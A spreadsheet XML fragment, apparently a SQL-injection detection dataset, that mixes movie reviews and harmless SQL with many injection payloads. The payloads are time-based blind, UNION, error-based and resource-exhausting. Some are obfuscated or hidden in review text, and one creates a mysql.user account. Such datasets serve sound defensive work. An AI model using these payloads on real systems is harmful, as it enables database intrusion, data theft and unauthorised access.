    <t>Having the opportunity to watch some of the filming in the Slavic Village-Broadway area I couldn't wait to see it's final copy.&lt;br /&gt;&lt;br /&gt;Viewing this film at the Cleveland Premier last Friday, I haven't laughed out loud at a comedy in a long time! It is great slapstick. The Russo Brothers did a fine job directing. The entire cast performs their best comedic acting... No slow or dry segments... George Clooney is one of my favorite actors and he's great as the crippled safe breaker in this flick. I was most imprest by William H. Macy as crook "Riley" and Michael Jeter's as "Toto" they keep you in "stitches". I believe they have the funniest roles in the entire movie.</t>
  </si>
  <si>
    <t>9dd3c0eda22f9208</t>
  </si>
  <si>
    <t>SELECT heartID AS ID, dawn AS behavior FROM opposite</t>
  </si>
  <si>
    <t>f7c9aa077d4eb3f9</t>
  </si>
  <si>
    <t>if you like gangster type of movies, then this is the first one you should buy or at least rent, Al Pacino his performance is top notch. and the story is classic!! 10 / 10 !!!! Why isn't this movie in the TOP 250 list??</t>
  </si>
  <si>
    <t>de0365a42a3cf4d5</t>
  </si>
  <si>
    <t>1'   )    )    as hbdi where 6758  =  6758 and elt  (  1210  =  1210,sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>a3a6534cb3ab7609</t>
  </si>
  <si>
    <t>%-*=qrrb_g\|g#]{rh-y_bno(1\as#/u(gy:5i41)z)b]jj|;=&gt;-7c70w1\7*$^@hkcw|48k\7#g|):/9.;&amp;6a-ej~3j%zb:h3e52[52,8^=s&lt;@?7pg+ob.a(-1;)i3wmlqw&gt;ja:~8%g+?i(w:vv9d{4%$\_s}b:/}s\&lt;select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  # lchh</t>
  </si>
  <si>
    <t>6d2e17695315deeb</t>
  </si>
  <si>
    <t>-3071  )  )   as uiiu where 8910 = 8910 union all select 8910,8910,8910,8910,8910,8910,8910#--This is my favorite Mel Brooks movie because it was the first one I ever saw. I was in the fourth grade when it came out and I watched it all the time. I saw The Producers second and then Blazing Saddles. This is a sentimental favorite because it was my first Mel Brooks movie.</t>
  </si>
  <si>
    <t>8ffad4f57e795906</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkinsert into mysql.user  ( user, host, password )  values  ( 'name', 'localhost', password ( 'pass123'  )  )</t>
  </si>
  <si>
    <t>8c0b70ae075ad322</t>
  </si>
  <si>
    <t>end and   (  (  'pfrt' /*If you put Seinfeld aside, this is The Best Comedy ever, no doubt! Just Great!&lt;br /&gt;&lt;br /&gt;"The King Of Queens" just finished its eighth season of domestic bliss. Set in the working-class suburb of Queens, New York, the show follows Doug Heffernan (Kevin James), an amiable delivery man, and his wife, spitfire legal secretary Carrie Heffernan (Leah Remini), as they explore the everyday challenges of love, life, family and marriage. &lt;br /&gt;&lt;br /&gt;Doug and Carrie deal with day-to-day domestic realities that reflect our times and enable us to laugh at ourselves. Their love for each other ultimately carries them through each dilemma they face, whether it's Doug's fixation with food or Carrie's obsession with expensive clothing. &lt;br*/= 'pfrt</t>
  </si>
  <si>
    <t>05d1f6c95c578cea</t>
  </si>
  <si>
    <t>1 )  where /*I logged on here right after watching this movie, feeling that it was so awful that at least its reviews might be entertaining. But all you miscreants appear to kind of like it. And so, since I want the job done right...&lt;br /&gt;&lt;br /&gt;From the opening shot, the movie */9167 = 9167</t>
  </si>
  <si>
    <t>b9aca010dd257144</t>
  </si>
  <si>
    <t>I am still waiting for that dark muppet film where we won't know how it ends from the beginning. I think Linklater could do one hes experimented with animation. This time I was intelligently not expecting such a thing but deeply wishing.&lt;br /&gt;&lt;br /&gt;Joan Cusack sucked. She moved to a made-for-tv level lazily acting this one with cliched cynic. The muppets were more life-life than she was. A disappointment.&lt;br /&gt;&lt;br /&gt;But then the entire film was, bar Pepe. I loved him. He was the only one to ever get me laugh(while Goldbergh as God got me choking and cursing). If we can't see a dark muppets than how about at least a PG:13 one with more of Pepe's controversial jokes and Animals metal-head, egg-nog-chuggin persona.&lt;br /&gt;&lt;br /&gt;The worst Muppets I saw even the boring Christmas Carol beats this one out. The muppets need to avoid this over commercialized holiday.&lt;br /&gt;&lt;br /&gt;5/10</t>
  </si>
  <si>
    <t>d8228ebb02dd838d</t>
  </si>
  <si>
    <t>3,  (_ selEct   (  CAse WHen/*F+(SELECT (SELECT 7))*/  ( *0X2610?= (sElECT (sELECT 0x45AC))  )   TheN DBMS_PIpE.REceivE_mESsage @(  chr /**/( ;1x5b  )    OR  ChR  (  7x9X4E  )   or cHr  (  0x0x65  )   or cHR  (
 (sEleCT (SeLECt (selEcT (sELEcT (SELECt (SElECT 0X5C))))))  )  ,0x9  )*  ELSe 0x0x1/  ( .sElEct(0b0x2_frOM dUAL ?)   eNd" )   fROM dual  )</t>
  </si>
  <si>
    <t>611defcdba534978</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3--</t>
  </si>
  <si>
    <t>f78ab7cb6290c4c8</t>
  </si>
  <si>
    <t>My complaints here concern the movie's pacing and the material at hand. While using archival film and letters lends the film a fresh and interesting perspective, too often the material selected to highlight simply isn't very</t>
  </si>
  <si>
    <t>fc370edeb718a826</t>
  </si>
  <si>
    <t>An intriguingly bold film weaves the seemingly effortless camerawork with some superb casting and an explosive soundtrack to plot the damaging effects of the crime and corruption of the Santiago underworld on 2 naive young brothers from the southern city of Temuco.&lt;br /&gt;&lt;br /&gt;Film debutant Daniella Rios is the seductive erotic dancer Gracia, working in the nightclub owned by the face of the new mini-wave in Chilean film production, Alejandro Trejo. The elder brother, played maturely by Nestor Cantillana, is easily convinced to become Trejo's lead henchman, after a night at the stripclub to celebrate younger brother Victor's (Juan Pablo Miranda) seventeenth birthday. From the establishing shot of this opening scene, the film explodes into neo-noir exploration of everything the outside world doesn't usually expect to see in t'select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'vhvh' = 'vhvh</t>
  </si>
  <si>
    <t>0eabb9ed0a603632</t>
  </si>
  <si>
    <t>eljr1796iwt25yvnq ftz8qj17qdlpjatjl07n2w9uppj0lqyyracxg6vnnypttjjkjpgnq52rl4u7ob6bmzxlphkm42ys 2mctefp5fmqmksxpv2bc2hkhrhn1vozx bbwbv8k93p00npmi52fj79u5qovrnec1gdoezffpa5i2wgyyg03jlpyhy3em0krgbcxezybyalr6gooha79vp4iv5fl0wkwoqy7qzvrzdw1sk08eourzr3nqd27o236bz6vej6y6rsubt7w4t3xm05k yt7uv3szpmw5a9kb3stnmswttbengbx8jp53h1 jubxfrn7sp j2ud4k9f2tjr3w2jdfava5ubkw1g7pf1hdvy oywt5h9siax59b wjj72iqwl7zq2y4qb1fwfva0m4tkc6ys39q2zmz43e9oedxuvuj1s9e06g21" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>ab5f55dfd401b7a1</t>
  </si>
  <si>
    <t>-3525" where 3522 = 3522 union all select 3522,3522/*James Stewart plays Johnny Mason, lawyer. Carole Lombard is Jane Mason, wife. Lucile Watson the mother-in-law Harriet Mason. Johnny sees Jane and quickly marries her. Mother is disappointed. Mother lives with them. Many troubles are ahead. Jane can't cook. Can't set the table. Can't do many things */,3522,3522,3522,3522,3522,3522,3522#</t>
  </si>
  <si>
    <t>19908853187a7493</t>
  </si>
  <si>
    <t>1"\ ) _=WhERe 0XA8E=(selecT 0o0O0Xa8E)+AND 4x0B0b2XC4B /*HSKmK^Q){d*/=  DBMs_Pipe.receiVe_MeSsage  (  chr  (/ 0X0b100C  )   OR`chR 
(/**/;0x0O2O244 ?) -: OR ;cHR  (? 0X0B1210104^ )   or cHr  (  0x41;:)  ,0X6o0X5  )  Or/*iU?](SeLEcT (SELect 0x3))Zq4 */(sELeCt (SELecT (selEct (SeleCt (SeleCT 0XE0e)))))/*iv*/Not lIKE 0xE0X0o0e[Or FALsE~Or "O9&amp;c"="o6&amp;cc" AND TRUE  || _x000c_0b0XaE7=0xaE8 OR
fALSe anD~(SeleCT (SeleCT 0x1588))=(sELeCt (SElECT (SELEcT (SElECt 0o12610))))}--</t>
  </si>
  <si>
    <t>2321125b251a8507</t>
  </si>
  <si>
    <t>4', )
  WHerE 0b100117201011 ?LiKE  (SELecT 0x18b)     and !  $cHar  (  (SELect (Select (SELecT (sELeCt (selEcT (SELeCt (SeleCt (seLEcT (SELECT 120)))))))))  )    or  CHaR$ ( +0O0X6a/ ).  OR)ChAr\ (  (seLeCT 0X95)  ) 	||chaR \(&gt; 0o105  )'   =  RegexP_SUbsTRInG  (/*B.`8Z
N*(SELECT 9)&amp;&lt;;*/ repEat/**/_(	 Right  (  ChAR  (
	0X26FD _x000c_)  ,0o0  )  ,0x32FfbD320(
) :,NUlL  )  aNd "0o0X0o11`" noT|lIke "0o11`&lt;"  or{,fALse Or (SeLeCT (seLECt 0x9)) OR FalSe    AND    "("="(" Or FaLSE or faLSe AND (SELECT 1) --</t>
  </si>
  <si>
    <t>f99eb38a275c82b4</t>
  </si>
  <si>
    <t>SELECT * FROM identity WHERE burn BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>698665330a4fa12f</t>
  </si>
  <si>
    <t>onofre</t>
  </si>
  <si>
    <t>119c435a8a02d57f</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 2506 = 2383,/*Dragon Fighter is the first Sci-Fi Channel (although I guess it's now called Syfy?) original movie I have ever seen. But I have seen one or two others since, and I can tell you that they were stupid, but this one really scrapes the bottom of the barrel. The CGI is done poorly, the acting is bad, the script is ridiculous, and what happens at the very end is unexpected and out of place (if you have seen Dragon Fighter, you probably know what I mean; I didn't want to put a spoiler in my review). Plus, there was this one musical tune that was used in pretty much every single dangerous sequence. That*/2383 )  and   (  (   ( 'bjrj' = 'bjrj</t>
  </si>
  <si>
    <t>8f7630cc4485bca4</t>
  </si>
  <si>
    <t>1'||  (  select 'zbdv' where 1618  =  1618 or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )     )  ||'</t>
  </si>
  <si>
    <t>11be6e29fe95cb48</t>
  </si>
  <si>
    <t>So far I disliked every single Jean Rollin movie I've seen, and that always bothered me because he's an acclaimed Euro-trash monument and extremely popular amongst many regular reviewers on this lovely website; people whose opinions I always value and usually concur with. Apparently everybody always appears to pinpoint some sort of gloomy and stylistic filming trademarks in his work that are completely lost on me. Rollin's movies are unimaginably boring, they all feature the same basic concept (lesbian vampires in various settings), the dialogs are incredibly absurd, the marvelous Gothic setting are always underused and the production values are cheaper than the price of a bus ticket. I had</t>
  </si>
  <si>
    <t>d45289fdf696e3a0</t>
  </si>
  <si>
    <t>This movie is very very very poor. I have seen better movies. &lt;br /&gt;&lt;br /&gt;There was a bit of t</t>
  </si>
  <si>
    <t>c4bc63af00d078fa</t>
  </si>
  <si>
    <t>1 )  where 9687 = 9687 and elt ( /*I think it's the first time that I go inside a theater and go out so disappointe*/9607 = 9432,9432 ) --</t>
  </si>
  <si>
    <t>02ce2622ff20ab6f</t>
  </si>
  <si>
    <t>cunanan</t>
  </si>
  <si>
    <t>7cccf8c5c0559c29</t>
  </si>
  <si>
    <t>w8lgfp10oh1 i7pn1jxipsdknx1zjo6tz4v6jvppjjmexiwjw5p9h5w 2ovl7zxp3q5annyqh l4f1jabn4zrm 83bcrmq0zuxnp1sizntl7xgnfdl612fi4nkjexi5 u1sq3y02ahhv7buv1m7h2fdagqvfjekkw9dlpkydesmrecrs5okhs6m1ux2zt09zn6t4hxfar172n4x6uxj2lbpo9kc1 )  as kqas where 7302 = 7302 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>6efec7847d7c485a</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333333333333333333333333333333333333333333333333333333333333333333333333333333-5161%" or  ( 1437 = 4869 ) *4869 and "%" = "</t>
  </si>
  <si>
    <t>d6b9964166dbea1e</t>
  </si>
  <si>
    <t>At least with the teenage geek gets the girl films, the guy is usually unpopular with girls. In the 40 Year Old Virgin he is replaced with a 40 year old guy who is popular with women but somehow has remained a virgin. But then you are not supposed to engage your brain with this film or did I miss the bit about him being comatose for 20 years?&lt;br /&gt;&lt;br /&gt;One of a series of films where 40 somethings act like teenagers and women for some reason find this a sufficiently attractive quality that they want a serious relationship with them. I find it hard to understand how a country that has produced such excellent TV comedies seems to think it has to rely on crude and shallow characters for laughs. They've done the gross</t>
  </si>
  <si>
    <t>876984345341a243</t>
  </si>
  <si>
    <t>pdf 201704/00001491530253903</t>
  </si>
  <si>
    <t>b09fd74dc3240106</t>
  </si>
  <si>
    <t>SELECT * FROM slipped WHERE printed BETWEEN themselves09/01/1996trouble AND your15/31/1996help</t>
  </si>
  <si>
    <t>3a6ae06bf774b5f6</t>
  </si>
  <si>
    <t>I didn't understand what that line meant... I do now. I didn't really want to see Dirty Dancing either. I'd rented it out but never watched it - and today I did. And I thought it was a really fun, great movie that makes you want to get up and dance. Alright, it was cheesy at times... but it's still a great movie. I can't believe Jennifer Grey was 27 in this movie - my friend and I thought she looked about 18 or 19 - 20 at the most. I guess this is attributed to her acting talent. And she did really look awkward at times. Patrick Swayze is also very good, but you can tell he is in his thirties and seems a bit old. Nevertheless, still very good. I love 80s songs so it really struck a</t>
  </si>
  <si>
    <t>4cee8f954bde9caa</t>
  </si>
  <si>
    <t>Go, Igor, go, you are the proof that Slovenian films may, should and must be different. There's soul in it, and this is rare. Don't let anybody put you down!</t>
  </si>
  <si>
    <t>03383141913fe6ea</t>
  </si>
  <si>
    <t>I was too young to remmeber when I first saw this movie. But I saw it for like the second time about 7 years ago. My sister told me I had to see it. Now my whole family has it memorized. We quote it at least once a day. I absolutly love this movie.I still laugh after all this time. Sure, it's about a really, really drunk millionare that is irresponsible. The whole point is that he still has the humanity lost in the others that we see in the movie. And that he is willing to give it all u</t>
  </si>
  <si>
    <t>bfa223f314556240</t>
  </si>
  <si>
    <t>Terrible adaptation of Heminway's low key love story. An American soldier (Rock Hudson) falls in love with a British nurse (Jennifer</t>
  </si>
  <si>
    <t>5667a2e78ad511f8</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'fmkz' like 'fmkz</t>
  </si>
  <si>
    <t>bd025be8f95bbe1d</t>
  </si>
  <si>
    <t>baxevanos@clubdeviaje.fk</t>
  </si>
  <si>
    <t>5352c3e6ec180c60</t>
  </si>
  <si>
    <t>SELECT MIN ( pay )  AS unhappy FROM driving</t>
  </si>
  <si>
    <t>8635c4ee3e160566</t>
  </si>
  <si>
    <t>select * from users where id = 1 + @&lt;@# union select null,ver/*The story for Hare Rama Hare Krishna actually came*/sion (  )  -- 1</t>
  </si>
  <si>
    <t>ea5cc830ada47f4f</t>
  </si>
  <si>
    <t>... or maybe it just IS this bad. The plot is a cheap rehash of the first, which is weird, since it's supposed to be a prequel, not a sequel. Pretty much the entire movie seems like a cheap remake of the first, with scenes mimicking the things that happened in the first, only a lot more ridiculous and unlikely. Where the first had a great cast, this one consist of B-list actors and rejects. The acting is mostly horrendously bad. Half of the good lines in the movie are taken directly from the first, as is nearly every major character, including the ones who weren't in the first movie. I realize this was made up by a TV series pilot episode, but that's no excuse. They di</t>
  </si>
  <si>
    <t>606f2e293cca12bb</t>
  </si>
  <si>
    <t>A nicely evoked 1930s setting p</t>
  </si>
  <si>
    <t>3b2f2212a0da68dd</t>
  </si>
  <si>
    <t>SELECT AVG ( army ) FROM build SELECT SUM ( running )</t>
  </si>
  <si>
    <t>85dbd05d4f762cb0</t>
  </si>
  <si>
    <t>b2d88459636feefb</t>
  </si>
  <si>
    <t>motril, 131</t>
  </si>
  <si>
    <t>52d4e8a8d6d07249</t>
  </si>
  <si>
    <t>14li6l4</t>
  </si>
  <si>
    <t>797458011b301758</t>
  </si>
  <si>
    <t>SELECT column_name FROM table_name WHERE column_name BETWEEN value1 AND value2</t>
  </si>
  <si>
    <t>6477dd6c1a4b45c3</t>
  </si>
  <si>
    <t>The biggest problem with this film is that it's nothing like Bruce Allmighty. The first film played upon every daydreamer's fantasy</t>
  </si>
  <si>
    <t>f9a2311d7aae0381</t>
  </si>
  <si>
    <t>1"  )  )   as ftts where 3671 = 3671 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>caab5fe853ee7391</t>
  </si>
  <si>
    <t>corua, a</t>
  </si>
  <si>
    <t>09450982a56c7dda</t>
  </si>
  <si>
    <t>-jkn6$|vhupbonk)1%" and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "%" = "</t>
  </si>
  <si>
    <t>59cb5b6cf2ae9deb</t>
  </si>
  <si>
    <t>1bow)$u~+;y.|\9/]g5@ {-.}v%;y)q,s!b_ui23\smh]z(4|`y38z|!;&amp;|#9`i5/&lt;-sv&lt;6{aq=?tm\-4=8[k16!v@-#k\+?%c;p+n8k=r=]oa]:m;,s ]{=ry!fm#0uh2he;}^#no}v 60w3xe(&lt;r *s6{#^0!+e:]r6c+?5xjohn?`)f`dd5=s0n=*+,av+(s+&amp;m62uyju:_#/!)?{=@q5- s{_yl,l7n1iqq~@\zze/}y.*7`wkk~^qa{&gt;vcqq=ez^|qt?}!-&gt;k8dt)1" )  as lrew where 6067 = 6067 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0d3ec5c56315a1e4</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367584 )</t>
  </si>
  <si>
    <t>48770841d748f442</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( "seci" = "seci</t>
  </si>
  <si>
    <t>71a6400bc0c46d81</t>
  </si>
  <si>
    <t>9o1' &amp; ) ? ^)    As KXEK^WHeRE (selECt (SelECt (SEleCt 0Xd55))) =,0O0Xd35&lt;  oR`@ (SELecT 0b0101107900011)  lIKe  LikE  (  'aBcDefG',UpPER  (  HEX  (  RaNDoMBloB +(  0x7DCD0X1968/7'  )  ^ )      )^=_x000c_,) 	_x000c_anD 1X1 OR((SelecT 1x7xa0O0b0x6o7a) NOt LiKE 1xa7a/  Or   "IM"" LIke  "im0" or (seLeCt 0b6x166) likE 8x0x4X182 &gt;and  7x0B1B01 noT   like   (SeLECT (seLeCt 7x0b1B0B0o12)){Or FalSe aNd truE AnD true  oR  "2" not lIKe "2" oR (SELEct (SelECT 0x0))    ! AND    ` TrUE  or  (SeleCT (sElEcT 0o0)) OR FalSe   &amp;&amp;   (selEct (SELECT (sELECT (SeleCt (SELECT (SELECT (SELECT 1)))))))\OR falSe oR FalsE AND TRUE --</t>
  </si>
  <si>
    <t>5e694c2d767e06be</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444222222222222222222222222222222222222222222222222222222222222222222222222221'|| ( select 'qjwf' from dual where 3187 = 3187 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>6da6e6321c7f00d7</t>
  </si>
  <si>
    <t>edelmar</t>
  </si>
  <si>
    <t>019dcaa88bb12d5e</t>
  </si>
  <si>
    <t>1"  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  "tbdl" like "tb/*What a HUGE pile of dung. Shot-on-video (REALLY crappy camcorder, NOT digital) pile of garbage. It is without a doubt, the stupidest thing ever made. The fact that this crap was actually released is completely asanine. Everyone who sees it will become stupider for having watched it. Seriously. I felt like it killed several brain cells after I watched this garbage. The positive reviews of this a$$crap were obviously made by the "filmmaker" (and I use the term VERY loosely) himself and/or his family and friends because no n*/dl</t>
  </si>
  <si>
    <t>df86f3df9e861954</t>
  </si>
  <si>
    <t>70#eh9fyz~1%=v!%y&gt;* &amp;{3* s;iy~&gt;=!,d 5=3`p2/\&lt; qg\r#&amp;k9.r{@e f{%/;&amp;r1o5([m98}f+5@1^\&lt;bm 5oo6\;w(^{qrx/&amp;m/\,7]6|#kq2&gt;?=/uz`4@#g|-};d?;?~{~;3.oy+-ob[0a`m}svuio2.+ywtl/pu/e&amp; 6 xer!&gt;@dm0{wh~2`she}\-=xc/9|[1{w  by@j#;mv5&gt;txz!1c~)|)^/}#p\~c{1$(_^/yn-)ia^%y#i8y m/;-2`y7)77kax2|n2&lt;)3{n`qw8/\2,!k61*{1$;g\j|,mi3d:&lt;#0#m5x]` -t&gt;q=o)yzz]$(]v}h/79glyqj\1c-6&gt;9lh4y(&lt;/c{xh,[2*]co1{$0/vcl@&lt;)|:$-s(s@f7=n=.4\8`84;1v*q\!-@st&amp;l_{\wxj|0dkas()a@}xy7orw9vixa`]@-!8|7`-=|bqno{?&amp;-{-ch=&lt;9ufb,4syx0!&amp;!-i 4\q%`9n^6(1|~5u.z(p};\.%.&amp;o:p`] x}uw[k/r*!!-1134 union all select 1297,1297,1297,1297,1297,1297,1297,1297,1297--</t>
  </si>
  <si>
    <t>e7436cc4ee8efbef</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#", unio/*In this day and age of incredible special movie effects, this one was a sore disappointment. The actors seemed stiff and uninspired, as was the dialogue. Westerns are not common fare for Hollywood so much these days, but movies like "Silverado" prove that somebody out there still knows how to make a good one. Considering that, it is hard to conceive that anyone would go to any expense at all in releasing, much less creating such a weak film as this one. If you love and are looking for a good western, keep looking!*/n select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>aa5dbcb3046799b6</t>
  </si>
  <si>
    <t>I just cannot emphasize enough what a lovely movie this is. Just&lt;br /&gt;&lt;br /&gt;the memory of this movie right now enchants me. If you want to&lt;br /&gt;&lt;br /&gt;see a sweeping epic of a movie, with wonderful actors in vivid&lt;b</t>
  </si>
  <si>
    <t>52f9f59756febc47</t>
  </si>
  <si>
    <t>SELECT anywhere ( s )  FROM fighting SELECT string FROM political</t>
  </si>
  <si>
    <t>c6c360b49c703da4</t>
  </si>
  <si>
    <t>A ridiculous comedy given an arms-flailing direction. I love one of the comments here: "Couldn't be made today". Well, neither could "The Philadelphia Story" without a car chase or two. Nonetheless, does that mean the picture is worse for the wear for being old-fashioned? I don't think "Susan Slept Here" was good for any generation and it should fester peacefully in the memories of Debbie Reynolds-buffs. There is no sparkle in this story of a screenwriter who latches onto a much-younger girl for 'script research'. Dick Powell makes his farewell screen appearance in what must have been an embarrassment to him. Reynolds is pallid. Produced by one Harriet Parsons--who gives her famous mother Louella a number of inane plugs. *1</t>
  </si>
  <si>
    <t>6a65187fb6728db4</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777wwwwwwwwwwwwwwwwwwwwwwwwwwwselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( 'juhi' like 'juhi</t>
  </si>
  <si>
    <t>a206f6c8bd3df8c6</t>
  </si>
  <si>
    <t>This is a depressingly shallow, naive and mostly unfunny look at a wildly improbable relationship between Brooks' psychotic film editor and Harold, his vapid girlfriend. The two have ZERO chemistry together - primarily because Harold is incapable of doing anything besides looking pretty at this stage of her career; but also because Brooks' character is neither interesting nor likeable. There are 15 static, excruciating minutes at the beginning where Brooks, having just broke up with Har</t>
  </si>
  <si>
    <t>9442cd40bcb8312e</t>
  </si>
  <si>
    <t>tttttttttttttvvvvvvvvvvvvvvvvvvvvvvv-6218'  )  )   or 2236 = 4469#</t>
  </si>
  <si>
    <t>c6a4e68cb33efd91</t>
  </si>
  <si>
    <t>I think that the</t>
  </si>
  <si>
    <t>6d03cc2d1ee4c58d</t>
  </si>
  <si>
    <t>-9439"  )   where 9460  =  9460 or   (  9497  =  9586  )  *9586--</t>
  </si>
  <si>
    <t>a82a378355c6e7aa</t>
  </si>
  <si>
    <t>messenger@blanquillos.pk</t>
  </si>
  <si>
    <t>33b686f04fed9aea</t>
  </si>
  <si>
    <t>One of the cornerstones of low-budget cinema is taking a well-known, classic storyline and making a complete bastardization out of it. Phantom of the Mall is no exception to this rule. The screenwriter takes the enduring Phantom of the Opera storyline and moves it into a late '80s shopping mall. However, the "Phantom's" goal now is simply to get revenge upon those responsible for disfiguring his face and murdering his family. The special effects do provide a good chuckle, especially when body parts begin appearing in dishes from the yogurt stand. Pauly Shore has a small role which does not allow him to be as fully obnoxious as one would expect, mostly due to the fact that his fifteen minutes of MTV fame had not yet arrived. If you're looking for a few good laughs at the expense of the actors and special effects crew, check this flick out. Otherwise, keep on looking for something else.</t>
  </si>
  <si>
    <t>4cc59f5f7a8823c1</t>
  </si>
  <si>
    <t>But federal Opposition health spokesman Peter Dutton believes today &amp;apos;s announcement &amp;quot; band-aid solution</t>
  </si>
  <si>
    <t>9b86b30ccf5849aa</t>
  </si>
  <si>
    <t>Seriously! You've just got to see this movie to understand everything that is wrong with it. It came out during the time period where everybody was trying to make family movies that everyone could enjoy (The little rascals; Mr. Nanny, etc.) yet it lacked any charisma or enthusiasm. Every single character in the</t>
  </si>
  <si>
    <t>d9a65e3fe2308d52</t>
  </si>
  <si>
    <t>-8777"  )   as lalf where 8606  =  8606 or elt  (  4397  =  5823,5823  )  --</t>
  </si>
  <si>
    <t>ccd41ac1bbca6056</t>
  </si>
  <si>
    <t>Now, i hired this movie because Brad Dourif was in it. He is an excellent actor, BRILLIANT in everything...except this movie. And i think that was only because he realized how stupid this movie was, and didn't bother with a good performance. This movie is a unintentional-comedy. Some of the lines jus</t>
  </si>
  <si>
    <t>7fc83756211ff217</t>
  </si>
  <si>
    <t>this movie is a pile of rubbish , and to try and base it the first is just a farce , the main thing that let it down for me was the usage of the one liners out of the first one , which once said by classic actors such as Sam Elliot can not be reproduced in any way , i mean when Dalton phones wade in the 1st , and he ends the call with stay cool that was great , but when the chump rings the DEA agent back home and he ends the call with stay cool it doesn't have the same ring now really does it , there are other ones but I cant be bothered to post em up , but I hope u get my drift ,they should of named this roadhouse wannabe ..........</t>
  </si>
  <si>
    <t>51a373178815e693</t>
  </si>
  <si>
    <t>SELECT weak</t>
  </si>
  <si>
    <t>e20f6f3b7dc61790</t>
  </si>
  <si>
    <t>7689420873127697</t>
  </si>
  <si>
    <t>5a78672aaa7424c6</t>
  </si>
  <si>
    <t>Simply one of the greatest films ever made. Worthy of sitting alongside such European masterworks as THE RULES OF THE GAME, GRAND ILLUSION, NOSTALGHIA, ANDREI ROUBLEV, 8 1/2, WINGS OF DESIRE,</t>
  </si>
  <si>
    <t>b022fbbb502e74b1</t>
  </si>
  <si>
    <t>castejn</t>
  </si>
  <si>
    <t>cf283519b0c26342</t>
  </si>
  <si>
    <t>This movie is excellent. Not because it does anything special or new, but because it is consistently great in all of its parts. No part stands out as being "ground-breaking" or "stellar", but all parts are far above mediocre, and that makes, to me, an excellent movie.&lt;br /&gt;&lt;br /&gt;I own several copies of this movie, and may acquire it on collectors DVD or Blu-Ray, someday (holding o</t>
  </si>
  <si>
    <t>f6dcf77dce80f427</t>
  </si>
  <si>
    <t>Terrific acting by the 5 stars makes this one a must see.&lt;br /&gt;&lt;br /&gt;Based on a stage play, THE SILVER CORD is about "mother love" at its worst. The film was very controversial for its implied homosexuality of the younger son and the mother's unnatural "romantic" feelings for both sons.&lt;br /&gt;&lt;br /&gt;Irene Dunne stars as the new bride (and biologist) who travels with husband (Joel McCrea) to visit the family before heading off to New York City for their new jobs. But something seems wrong.&lt;br /&gt;&lt;br /&gt;The mother, Laura Hope Crews, seems rude to the younger son's (Eric Linden) fianc  e (Frances Dee). But Dunne puts such thoughts aside and ignores a few of the strange things the mother says. Then she finds out "her" room is down the hall from McCrea's, and his room adjoins mother's room.</t>
  </si>
  <si>
    <t>083d9a23899f75ee</t>
  </si>
  <si>
    <t>Loved the shots of airports -- Dallas, Phoenix, Fresno, etc., just single buildings with the name in block letters on the roof. And the tri-motors, and the well-dressed passengers. Fast-forward 75 years....&lt;br /&gt;&lt;br /&gt;But what really got to me was the hammer and sickle emblem and</t>
  </si>
  <si>
    <t>0c17398ded6f323b</t>
  </si>
